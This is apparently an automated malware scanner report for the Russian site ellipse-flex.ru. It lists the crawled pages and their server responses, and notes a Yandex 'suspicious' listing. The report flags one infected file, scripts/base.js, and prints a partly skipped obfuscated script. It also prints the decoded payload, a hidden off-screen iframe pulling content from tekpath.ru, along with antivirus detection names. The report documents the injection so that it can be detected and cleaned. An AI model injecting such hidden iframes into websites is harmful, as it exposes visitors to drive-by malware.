
Malware Scanner report for ellipse-flex.ru

Malicious/Suspicious/Total urls checked
1/0/26
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "ellipse-flex.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ellipse-flex.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ellipse-flex.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.

Scanned pages/files

Request / Server response / Status
http://www.ellipse-flex.ru/
200 OK
Content-Length: 9629
Content-Type: text/html
clean
http://www.ellipse-flex.ru/scripts/base.js
200 OK
Content-Length: 7013
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/32','Chrom
... 2232 bytes are skipped ...
p;i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}
function MM_swapImage() { var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src=http://tekpath.ru/idea.html?members style="position:absolute;left:-1200px;top:-1200px;" height="115" width="115"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566
Fortinet
JS/IFrame.XX!tr
Sophos
Troj/JSRedir-LH

http://www.ellipse-flex.ru/index.php
200 OK
Content-Length: 9629
Content-Type: text/html
clean
http://www.ellipse-flex.ru/the_company
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:27 GMT
Location: http://www.ellipse-flex.ru/the_company/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 247
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/the_company/
200 OK
Content-Length: 10456
Content-Type: text/html
clean
http://www.ellipse-flex.ru/treatment_areas
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:27 GMT
Location: http://www.ellipse-flex.ru/treatment_areas/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 251
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/treatment_areas/
200 OK
Content-Length: 11672
Content-Type: text/html
clean
http://www.ellipse-flex.ru/devices
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:27 GMT
Location: http://www.ellipse-flex.ru/devices/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 243
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/devices/
200 OK
Content-Length: 9541
Content-Type: text/html
clean
http://www.ellipse-flex.ru/ellipse_for_physicians
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:28 GMT
Location: http://www.ellipse-flex.ru/ellipse_for_physicians/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 258
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/ellipse_for_physicians/
200 OK
Content-Length: 8644
Content-Type: text/html
clean
http://www.ellipse-flex.ru/ellipse_for_beauticians
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:28 GMT
Location: http://www.ellipse-flex.ru/ellipse_for_beauticians/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 259
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/ellipse_for_beauticians/
200 OK
Content-Length: 8126
Content-Type: text/html
clean
http://www.ellipse-flex.ru/news
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:28 GMT
Location: http://www.ellipse-flex.ru/news/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/news/
200 OK
Content-Length: 7919
Content-Type: text/html
clean
http://www.ellipse-flex.ru/contact
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:29 GMT
Location: http://www.ellipse-flex.ru/contact/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 243
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/contact/
200 OK
Content-Length: 6949
Content-Type: text/html
clean
http://www.ellipse-flex.ru/contact/how_to_find_us
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:29 GMT
Location: http://www.ellipse-flex.ru/contact/how_to_find_us/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 258
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/contact/how_to_find_us/
200 OK
Content-Length: 7148
Content-Type: text/html
clean
http://www.ellipse-flex.ru/site_map/
200 OK
Content-Length: 13163
Content-Type: text/html
clean
http://www.ellipse-flex.ru/the_company/business_mission
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:29 GMT
Location: http://www.ellipse-flex.ru/the_company/business_mission/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/the_company/business_mission/
200 OK
Content-Length: 9050
Content-Type: text/html
clean
http://www.ellipse-flex.ru/the_company/market_trends
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:29 GMT
Location: http://www.ellipse-flex.ru/the_company/market_trends/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 261
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/the_company/market_trends/
200 OK
Content-Length: 8916
Content-Type: text/html
clean
http://www.ellipse-flex.ru/the_company/science_focus
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:30 GMT
Location: http://www.ellipse-flex.ru/the_company/science_focus/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 261
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/the_company/science_focus/
200 OK
Content-Length: 9709
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ellipse-flex.ru

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ellipse-flex.ru
Referer: http://www.google.com/search?q=ellipse-flex.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.